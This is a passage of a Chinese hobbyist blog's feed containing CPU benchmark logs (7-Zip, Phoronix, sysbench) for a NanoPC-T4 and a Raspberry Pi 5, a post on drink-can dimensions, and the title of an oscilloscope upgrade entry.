mmio_stale_data: Not affected</span><br><span class="line"> + reg_file_data_sampling: Not affected</span><br><span class="line"> + retbleed: Not affected</span><br><span class="line"> + spec_rstack_overflow: Not affected</span><br><span class="line"> + spec_store_bypass: Not affected</span><br><span class="line"> + spectre_v1: Mitigation of __user pointer sanitization</span><br><span class="line"> + spectre_v2: Vulnerable: Unprivileged eBPF enabled</span><br><span class="line"> + srbds: Not affected</span><br><span class="line"> + tsa: Not affected</span><br><span class="line"> + tsx_async_abort: Not affected</span><br><span class="line"></span><br><span class="line">7-Zip Compression 25.00:</span><br><span class="line"> pts/compress-7zip-1.12.0</span><br><span class="line"> Test 1 of 1</span><br><span class="line"> Estimated Trial Run Count: 3</span><br><span class="line"> Estimated Time To Completion: 4 Minutes [10:29 UTC]</span><br><span class="line"> Started Run 1 @ 10:25:56</span><br><span class="line"> Started Run 2 @ 10:27:30</span><br><span class="line"> Started Run 3 @ 10:29:03</span><br><span class="line"></span><br><span class="line"> Test: Compression Rating:</span><br><span class="line"> 6156</span><br><span class="line"> 6193</span><br><span class="line"> 6134</span><br><span class="line"></span><br><span class="line"> Average: 6161 MIPS</span><br><span class="line"> Deviation: 0.48%</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>sysbench </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line">disappear9@nanopct4:~$ sysbench cpu --cpu-max-prime=20000 --threads=6 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 6</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 2498.63</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0029s</span><br><span class="line"> total number of events: 25002</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 1.42</span><br><span class="line"> avg: 2.40</span><br><span class="line"> max: 16.88</span><br><span class="line"> 95th percentile: 3.62</span><br><span class="line"> sum: 59998.36</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 4167.0000/1956.22</span><br><span class="line"> execution time (avg/stddev): 9.9997/0.00</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">disappear9@nanopct4:~$ sysbench cpu --cpu-max-prime=20000 --threads=1 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 1</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 692.27</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0012s</span><br><span class="line"> total number of events: 6926</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 1.42</span><br><span class="line"> avg: 1.44</span><br><span class="line"> max: 12.87</span><br><span class="line"> 95th percentile: 1.44</span><br><span class="line"> sum: 9997.66</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 6926.0000/0.00</span><br><span class="line"> execution time (avg/stddev): 9.9977/0.00</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>CPU:Rockchip RK3399<br>RAM:4G </p>
<p>screenfetch </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@nanopct4</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P&quot;&quot; &quot;&quot;&quot;Y$$.&quot;. Kernel: aarch64 Linux 6.12.44-current-rockchip64</span><br><span class="line"> ,$$P&#x27; `$$$. Uptime: 15m</span><br><span class="line">&#x27;,$$P ,ggs. `$$b: Packages: 366</span><br><span class="line">`d$$&#x27; ,$P&quot;&#x27; . $$$ Shell: bash</span><br><span class="line"> $$P d$&#x27; , $$P Disk: 4.8G / 485G (2%)</span><br><span class="line"> $$: $$. - ,d$$&#x27; CPU: ARM Cortex-A53 Cortex-A72 @ 6x 1.416GHz</span><br><span class="line"> $$\; Y$b._ _,d$P&#x27; RAM: 4G</span><br><span class="line"> Y$$. `.`&quot;Y$$$$P&quot;&#x27;</span><br><span class="line"> `$$b &quot;-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `&quot;Y$b._</span><br><span class="line"> `&quot;&quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure></summary>
<category term="测试结果" scheme="https://thinkalone.win/categories/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
<category term="杂项" scheme="https://thinkalone.win/tags/%E6%9D%82%E9%A1%B9/"/>
<category term="测试结果" scheme="https://thinkalone.win/tags/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
</entry>
<entry>
<title>常见物品尺寸记录</title>
<link href="https://thinkalone.win/Common-Item-Sizes.html"/>
<id>https://thinkalone.win/Common-Item-Sizes.html</id>
<published>2025-06-01T04:00:00.000Z</published>
<updated>2025-06-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>记录一些常见物品的尺寸数据,默认单位为毫米(mm)<br>最后更新日期: 2025/06/01<br>现有数据: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">易拉罐: </span><br><span class="line">330mL/11.6 imp fl oz/11.2 us fl oz </span><br><span class="line">330mL/High/高/摩登罐 </span><br><span class="line">473mL/16.6 imp fl oz/16 us fl oz </span><br></pre></td></tr></table></figure><span id="more"></span><h2 id="易拉罐:"><a href="#易拉罐:" class="headerlink" title="易拉罐:"></a>易拉罐:</h2><h3 id="330mL"><a href="#330mL" class="headerlink" title="330mL"></a>330mL</h3><p><img src="/pictures/Common-Item-Sizes/Cans/330ml-D.png" alt="330ml-D.png"><br><img src="/pictures/Common-Item-Sizes/Cans/330ml-D2.png" alt="330ml-D2.png"><br><img src="/pictures/Common-Item-Sizes/Cans/330ml-H.png" alt="330ml-H.png"> </p><h3 id="330mL-High"><a href="#330mL-High" class="headerlink" title="330mL High"></a>330mL High</h3><p><img src="/pictures/Common-Item-Sizes/Cans/330ml-tall-D.png" alt="330ml-tall-D.png"><br><img src="/pictures/Common-Item-Sizes/Cans/330ml-tall-D2.png" alt="330ml-tall-D2.png"><br><img src="/pictures/Common-Item-Sizes/Cans/330ml-tall-H.png" alt="330ml-tall-H.png"> </p><h3 id="473mL-16oz"><a href="#473mL-16oz" class="headerlink" title="473mL 16oz"></a>473mL 16oz</h3><p><img src="/pictures/Common-Item-Sizes/Cans/473ml-D.png" alt="473ml-D.png"><br><img src="/pictures/Common-Item-Sizes/Cans/473ml-D2.png" alt="473ml-D2.png"><br><img src="/pictures/Common-Item-Sizes/Cans/473ml-H.png" alt="473ml-H.png"><br><img src="/pictures/Common-Item-Sizes/Cans/473ml-H2.png" alt="473ml-H2.png"> </p>]]></content>
<summary type="html"><p>记录一些常见物品的尺寸数据,默认单位为毫米(mm)<br>最后更新日期: 2025&#x2F;06&#x2F;01<br>现有数据: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">易拉罐: </span><br><span class="line">330mL/11.6 imp fl oz/11.2 us fl oz </span><br><span class="line">330mL/High/高/摩登罐 </span><br><span class="line">473mL/16.6 imp fl oz/16 us fl oz </span><br></pre></td></tr></table></figure></summary>
<category term="杂项" scheme="https://thinkalone.win/categories/%E6%9D%82%E9%A1%B9/"/>
<category term="杂项" scheme="https://thinkalone.win/tags/%E6%9D%82%E9%A1%B9/"/>
</entry>
<entry>
<title>树莓派5 Raspberry Pi 5 CPU跑分测试 CPU Benchmark</title>
<link href="https://thinkalone.win/RPi5-CPU-Benchmark.html"/>
<id>https://thinkalone.win/RPi5-CPU-Benchmark.html</id>
<published>2025-03-10T04:00:00.000Z</published>
<updated>2025-03-10T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>CPU:BCM2835<br>RAM:4G </p><p>screenfetch </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> ./+o+- disappear9@Pi5</span><br><span class="line"> yyyyy- -yyyyyy+ OS: Ubuntu 24.04 noble</span><br><span class="line"> ://+//////-yyyyyyo Kernel: aarch64 Linux 6.8.0-1020-raspi</span><br><span class="line"> .++ .:/++++++/-.+sss/` Uptime: 32m</span><br><span class="line"> .:++o: /++++++++/:--:/- Packages: 2548</span><br><span class="line"> o:+o+:++.`..```.-/oo+++++/ Shell: bash 5.2.21</span><br><span class="line"> .:+o:+o/. `+sssoo+/ Resolution: 4480x1440</span><br><span class="line"> .++/+:+oo+o:` /sssooo. WM: Not Found</span><br><span class="line">/+++//+:`oo+o /::--:. GTK Theme: Adwaita [GTK3]</span><br><span class="line">\+/+o+++`o++o ++////. Disk: 7.9G / 57G (15%)</span><br><span class="line"> .++.o+++oo+:` /dddhhh. CPU: ARM Cortex-A76 @ 4x 2.4GHz</span><br><span class="line"> .+.o+oo:. `oddhhhh+ RAM: 470MiB / 3984MiB</span><br><span class="line"> \+.++o+o``-````.:ohdhhhhh+</span><br><span class="line"> `:o+++ `ohhhhhhhhyo++os:</span><br><span class="line"> .o:`.syhhhhhhh/.oo++o`</span><br><span class="line"> /osyyyyyyo++ooo+++/</span><br><span class="line"> ````` +oo+++o\:</span><br><span class="line"> `oo++.</span><br><span class="line"></span><br></pre></td></tr></table></figure><span id="more"></span><p>7-zip 23.01:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Pi5:~$ 7z b -mmt4</span><br><span class="line"></span><br><span class="line">7-Zip 23.01 (arm64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20</span><br><span class="line"> 64-bit arm_v:8 locale=C.UTF-8 Threads:4 OPEN_MAX:1024</span><br><span class="line"></span><br><span class="line"> mt4</span><br><span class="line">Compiler: 13.2.0 GCC 13.2.0</span><br><span class="line">Linux : 6.8.0-1020-raspi : #24-Ubuntu SMP PREEMPT_DYNAMIC Sun Feb 23 08:39:32 UTC 2025 : aarch64</span><br><span class="line">PageSize:4KB THP:madvise hwcap:119FFF:CRC32:SHA1:SHA2:AES:ASIMD</span><br><span class="line">LE</span><br><span class="line"></span><br><span class="line">1T CPU Freq (MHz): 2130 2394 2394 2394 2394 2394 2394</span><br><span class="line">2T CPU Freq (MHz): 200% 2382 200% 2394</span><br><span class="line"></span><br><span class="line">RAM size: 3984 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 889 MB, # Benchmark threads: 4</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 10993 374 2857 10695 | 160334 396 3455 13679</span><br><span class="line">23: 10165 380 2727 10358 | 157739 399 3422 13649</span><br><span class="line">24: 9693 382 2727 10422 | 154513 399 3402 13560</span><br><span class="line">25: 9088 381 2725 10377 | 150242 399 3349 13371</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 9985 379 2759 10463 | 155707 398 3407 13565</span><br><span class="line">Tot: 389 3083 12014</span><br><span class="line">disappear9@Pi5:~$ 7z b -mmt1</span><br><span class="line"></span><br><span class="line">7-Zip 23.01 (arm64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20</span><br><span class="line"> 64-bit arm_v:8 locale=C.UTF-8 Threads:4 OPEN_MAX:1024</span><br><span class="line"></span><br><span class="line"> mt1</span><br><span class="line">Compiler: 13.2.0 GCC 13.2.0</span><br><span class="line">Linux : 6.8.0-1020-raspi : #24-Ubuntu SMP PREEMPT_DYNAMIC Sun Feb 23 08:39:32 UTC 2025 : aarch64</span><br><span class="line">PageSize:4KB THP:madvise hwcap:119FFF:CRC32:SHA1:SHA2:AES:ASIMD</span><br><span class="line">LE</span><br><span class="line"></span><br><span class="line">1T CPU Freq (MHz): 1490 1495 2134 2394 2394 2394 2394</span><br><span class="line"></span><br><span class="line">RAM size: 3984 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 437 MB, # Benchmark threads: 1</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 3509 100 3420 3414 | 42244 100 3604 3607</span><br><span class="line">23: 3261 100 3325 3323 | 41559 100 3603 3597</span><br><span class="line">24: 3136 100 3381 3373 | 40745 100 3577 3577</span><br><span class="line">25: 3010 100 3442 3437 | 39720 100 3529 3535</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 3229 100 3392 3387 | 41067 100 3579 3579</span><br><span class="line">Tot: 100 3485 3483</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>phoronix-test-suite benchmark compress-7zip</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Pi5:~/phoronix-test-suite$ ./phoronix-test-suite benchmark compress-7zip</span><br><span class="line"></span><br><span class="line">Phoronix Test Suite v10.8.4</span><br><span class="line"></span><br><span class="line"> To Install: pts/compress-7zip-1.11.0</span><br><span class="line"></span><br><span class="line"> pts/compress-7zip-1.11.0:</span><br><span class="line"> Test Installation 1 of 1</span><br><span class="line"> 1 File Needed [1.42 MB]</span><br><span class="line"> Downloading: 7z2405-src.tar.xz</span><br><span class="line"></span><br><span class="line">System Information</span><br><span class="line"></span><br><span class="line"> PROCESSOR: ARMv8 Cortex-A76 @ 2.40GHz</span><br><span class="line"> Core Count: 4</span><br><span class="line"> Scaling Driver: cpufreq-dt ondemand</span><br><span class="line"></span><br><span class="line"> GRAPHICS:</span><br><span class="line"> Screen: 4480x1440</span><br><span class="line"></span><br><span class="line"> MOTHERBOARD: Raspberry Pi 5 Model B Rev 1.0</span><br><span class="line"> Chipset: Broadcom BCM2712</span><br><span class="line"> Network: Raspberry Pi RP1 PCIe 2.0 South Bridge</span><br><span class="line"></span><br><span class="line"> MEMORY: 4096MB</span><br><span class="line"></span><br><span class="line"> DISK: 62GB SA64G</span><br><span class="line"> File-System: ext4</span><br><span class="line"> Mount Options: relatime rw</span><br><span class="line"> Disk Details: Block Size: 4096</span><br><span class="line"></span><br><span class="line"> OPERATING SYSTEM: Ubuntu 24.04</span><br><span class="line"> Kernel: 6.8.0-1020-raspi (aarch64)</span><br><span class="line"> Display Server: X Server</span><br><span class="line"> Compiler: GCC 13.3.0</span><br><span class="line"> Security: gather_data_sampling: Not affected</span><br><span class="line"> + itlb_multihit: Not affected</span><br><span class="line"> + l1tf: Not affected</span><br><span class="line"> + mds: Not affected</span><br><span class="line"> + meltdown: Not affected</span><br><span class="line"> + mmio_stale_data: Not affected</span><br><span class="line"> + reg_file_data_sampling: Not affected</span><br><span class="line"> + retbleed: Not affected</span><br><span class="line"> + spec_rstack_overflow: Not affected</span><br><span class="line"> + spec_store_bypass: Mitigation of SSB disabled via prctl</span><br><span class="line"> + spectre_v1: Mitigation of __user pointer sanitization</span><br><span class="line"> + spectre_v2: Mitigation of CSV2 BHB</span><br><span class="line"> + srbds: Not affected</span><br><span class="line"> + tsx_async_abort: Not affected</span><br><span class="line"></span><br><span class="line">7-Zip Compression 24.05:</span><br><span class="line"> pts/compress-7zip-1.11.0</span><br><span class="line"> Test 1 of 1</span><br><span class="line"> Estimated Trial Run Count: 3</span><br><span class="line"> Estimated Time To Completion: 17 Minutes [07:36 UTC]</span><br><span class="line"> Started Run 1 @ 07:20:28</span><br><span class="line"> Started Run 2 @ 07:21:09</span><br><span class="line"> Started Run 3 @ 07:21:50</span><br><span class="line"></span><br><span class="line"> Test: Compression Rating:</span><br><span class="line"> 10584</span><br><span class="line"> 10772</span><br><span class="line"> 10731</span><br><span class="line"></span><br><span class="line"> Average: 10696 MIPS</span><br><span class="line"> Deviation: 0.92%</span><br><span class="line"></span><br><span class="line"> Test: Decompression Rating:</span><br><span class="line"> 13478</span><br><span class="line"> 13524</span><br><span class="line"> 13528</span><br><span class="line"></span><br><span class="line"> Average: 13510 MIPS</span><br><span class="line"> Deviation: 0.21%</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>sysbench </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Pi5:~$ sysbench cpu --cpu-max-prime=20000 --threads=4 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 4</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 4128.44</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0010s</span><br><span class="line"> total number of events: 41295</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 0.96</span><br><span class="line"> avg: 0.97</span><br><span class="line"> max: 10.02</span><br><span class="line"> 95th percentile: 0.97</span><br><span class="line"> sum: 39994.74</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 10323.7500/20.90</span><br><span class="line"> execution time (avg/stddev): 9.9987/0.00</span><br><span class="line"></span><br><span class="line">disappear9@Pi5:~$ sysbench cpu --cpu-max-prime=20000 --threads=1 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 1</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 1033.96</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0007s</span><br><span class="line"> total number of events: 10342</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 0.96</span><br><span class="line"> avg: 0.97</span><br><span class="line"> max: 1.51</span><br><span class="line"> 95th percentile: 0.97</span><br><span class="line"> sum: 9998.56</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 10342.0000/0.00</span><br><span class="line"> execution time (avg/stddev): 9.9986/0.00</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>CPU:BCM2835<br>RAM:4G </p>
<p>screenfetch </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> ./+o+- disappear9@Pi5</span><br><span class="line"> yyyyy- -yyyyyy+ OS: Ubuntu 24.04 noble</span><br><span class="line"> ://+//////-yyyyyyo Kernel: aarch64 Linux 6.8.0-1020-raspi</span><br><span class="line"> .++ .:/++++++/-.+sss/` Uptime: 32m</span><br><span class="line"> .:++o: /++++++++/:--:/- Packages: 2548</span><br><span class="line"> o:+o+:++.`..```.-/oo+++++/ Shell: bash 5.2.21</span><br><span class="line"> .:+o:+o/. `+sssoo+/ Resolution: 4480x1440</span><br><span class="line"> .++/+:+oo+o:` /sssooo. WM: Not Found</span><br><span class="line">/+++//+:`oo+o /::--:. GTK Theme: Adwaita [GTK3]</span><br><span class="line">\+/+o+++`o++o ++////. Disk: 7.9G / 57G (15%)</span><br><span class="line"> .++.o+++oo+:` /dddhhh. CPU: ARM Cortex-A76 @ 4x 2.4GHz</span><br><span class="line"> .+.o+oo:. `oddhhhh+ RAM: 470MiB / 3984MiB</span><br><span class="line"> \+.++o+o``-````.:ohdhhhhh+</span><br><span class="line"> `:o+++ `ohhhhhhhhyo++os:</span><br><span class="line"> .o:`.syhhhhhhh/.oo++o`</span><br><span class="line"> /osyyyyyyo++ooo+++/</span><br><span class="line"> ````` +oo+++o\:</span><br><span class="line"> `oo++.</span><br><span class="line"></span><br></pre></td></tr></table></figure></summary>
<category term="测试结果" scheme="https://thinkalone.win/categories/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
<category term="杂项" scheme="https://thinkalone.win/tags/%E6%9D%82%E9%A1%B9/"/>
<category term="测试结果" scheme="https://thinkalone.win/tags/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
</entry>
<entry>
<title>鼎阳 SDS804X HD 示波器带宽与选件升级</title>
<link href="https://thinkalone.win/SDS804X-HD-Upgrade.html"/>
<id>https://thinkalone.win/SDS804X-HD-Upgrade.html</id>
<published>2025-03-01T04:00:00.000Z</published>
<updated>2025-03-01T04:00:00.000Z</updated>
